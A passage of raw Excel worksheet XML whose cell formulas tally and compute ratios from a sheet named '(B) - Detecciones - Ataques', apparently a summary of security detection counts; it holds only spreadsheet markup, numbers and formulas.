      <c r="EG66" s="279"/>
      <c r="EH66" s="271"/>
      <c r="EI66" s="435" t="s">
        <v>2493</v>
      </c>
      <c r="EJ66" s="427">
        <f t="shared" ref="EJ66:EM66" si="61">1-EJ65</f>
        <v>0.847826087</v>
      </c>
      <c r="EK66" s="427">
        <f t="shared" si="61"/>
        <v>0.652173913</v>
      </c>
      <c r="EL66" s="427">
        <f t="shared" si="61"/>
        <v>0.6689189189</v>
      </c>
      <c r="EM66" s="427">
        <f t="shared" si="61"/>
        <v>0.8167938931</v>
      </c>
      <c r="EN66" s="441"/>
      <c r="EO66" s="271"/>
      <c r="EP66" s="271"/>
      <c r="EQ66" s="483"/>
      <c r="ER66" s="478"/>
      <c r="ES66" s="478"/>
      <c r="ET66" s="478"/>
      <c r="EU66" s="478"/>
      <c r="EV66" s="478"/>
      <c r="EW66" s="478"/>
      <c r="EX66" s="478"/>
      <c r="EY66" s="478"/>
      <c r="EZ66" s="478"/>
      <c r="FA66" s="479"/>
      <c r="FD66" s="480"/>
      <c r="FG66" s="491" t="s">
        <v>7</v>
      </c>
      <c r="FH66" s="69">
        <v>0.07602339181286555</v>
      </c>
      <c r="FI66" s="368">
        <f>EK66</f>
        <v>0.652173913</v>
      </c>
      <c r="FM66" s="480"/>
      <c r="FN66" s="480"/>
      <c r="FO66" s="480"/>
      <c r="FP66" s="480"/>
      <c r="FQ66" s="480"/>
      <c r="FR66" s="480"/>
      <c r="FS66" s="480"/>
      <c r="FT66" s="480"/>
      <c r="FU66" s="480"/>
      <c r="FV66" s="480"/>
      <c r="FW66" s="480"/>
      <c r="FX66" s="480"/>
      <c r="FY66" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="FZ66" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$FA$3:$FA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GA66" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$FB$3:$FB$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GB66" s="480"/>
      <c r="GC66" s="379" t="s">
        <v>2013</v>
      </c>
      <c r="GD66" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$GQ$3:$GQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GE66" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+SUMIFS('(B) - Detecciones - Ataques'!$GR$3:$GR$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY49)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY49 &amp; "*"))</f>
        <v>0</v>
      </c>
      <c r="GF66" s="480"/>
      <c r="GG66" s="480"/>
      <c r="GH66" s="480"/>
      <c r="GI66" s="480"/>
      <c r="GJ66" s="480"/>
      <c r="GK66" s="480"/>
      <c r="GL66" s="480"/>
      <c r="GM66" s="480"/>
      <c r="GN66" s="480"/>
      <c r="GO66" s="480"/>
      <c r="GP66" s="480"/>
      <c r="GQ66" s="480"/>
      <c r="GR66" s="480"/>
      <c r="GS66" s="480"/>
      <c r="GT66" s="480"/>
      <c r="GU66" s="480"/>
      <c r="GV66" s="480"/>
      <c r="GW66" s="480"/>
      <c r="GX66" s="480"/>
      <c r="GY66" s="480"/>
      <c r="GZ66" s="480"/>
      <c r="HA66" s="480"/>
      <c r="HB66" s="480"/>
      <c r="HC66" s="480"/>
      <c r="HD66" s="480"/>
      <c r="HE66" s="480"/>
      <c r="HF66" s="480"/>
      <c r="HG66" s="480"/>
      <c r="HH66" s="480"/>
      <c r="HI66" s="480"/>
      <c r="HJ66" s="480"/>
      <c r="HK66" s="480"/>
      <c r="HL66" s="480"/>
      <c r="HM66" s="480"/>
      <c r="HN66" s="480"/>
      <c r="HO66" s="480"/>
      <c r="HP66" s="480"/>
    </row>
    <row r="67">
      <c r="J67" s="277"/>
      <c r="K67" s="492">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CQ3:CQ139)</f>
        <v>185271</v>
      </c>
      <c r="L67" s="493">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!CZ3:CZ139)</f>
        <v>166287</v>
      </c>
      <c r="M67" s="493">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!FW3:FW139)</f>
        <v>694997</v>
      </c>
      <c r="N67" s="494">
        <f>SUMIF('(B) - Detecciones - Ataques'!IS3:IS139,"✔",'(B) - Detecciones - Ataques'!GF3:GF139)</f>
        <v>600411</v>
      </c>
      <c r="O67" s="278"/>
      <c r="Q67" s="271"/>
      <c r="R67" s="352" t="s">
        <v>2534</v>
      </c>
      <c r="S67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>28</v>
      </c>
      <c r="T67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>113</v>
      </c>
      <c r="V67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>17</v>
      </c>
      <c r="W67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="X67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>4</v>
      </c>
      <c r="Y67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>1</v>
      </c>
      <c r="Z67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>579</v>
      </c>
      <c r="AA67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>342</v>
      </c>
      <c r="AB67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>19</v>
      </c>
      <c r="AC67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="AD67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AE67" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="AF67" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>461</v>
      </c>
      <c r="AG67" s="271"/>
      <c r="AH67" s="352" t="s">
        <v>2534</v>
      </c>
      <c r="AI67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>23</v>
      </c>
      <c r="AJ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>4</v>
      </c>
      <c r="AL67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>108</v>
      </c>
      <c r="AR67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>1</v>
      </c>
      <c r="AS67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>0</v>
      </c>
      <c r="AU67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>2</v>
      </c>
      <c r="AV67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>2</v>
      </c>
      <c r="AW67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>16</v>
      </c>
      <c r="AY67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>1</v>
      </c>
      <c r="BA67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>0</v>
      </c>
      <c r="BB67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>2</v>
      </c>
      <c r="BD67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>0</v>
      </c>
      <c r="BG67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>0</v>
      </c>
      <c r="BI67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>0</v>
      </c>
      <c r="BJ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>0</v>
      </c>
      <c r="BK67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>0</v>
      </c>
      <c r="BL67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>1</v>
      </c>
      <c r="BM67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>568</v>
      </c>
      <c r="BN67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>10</v>
      </c>
      <c r="BO67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>204</v>
      </c>
      <c r="BR67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>2</v>
      </c>
      <c r="BT67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>0</v>
      </c>
      <c r="BU67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>1</v>
      </c>
      <c r="BX67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>8</v>
      </c>
      <c r="BZ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>123</v>
      </c>
      <c r="CA67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>0</v>
      </c>
      <c r="CC67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>1</v>
      </c>
      <c r="CG67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>1</v>
      </c>
      <c r="CJ67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>1</v>
      </c>
      <c r="CL67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>0</v>
      </c>
      <c r="CN67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO67" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GB3:$GB139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>6</v>
      </c>
      <c r="CP67" s="355">
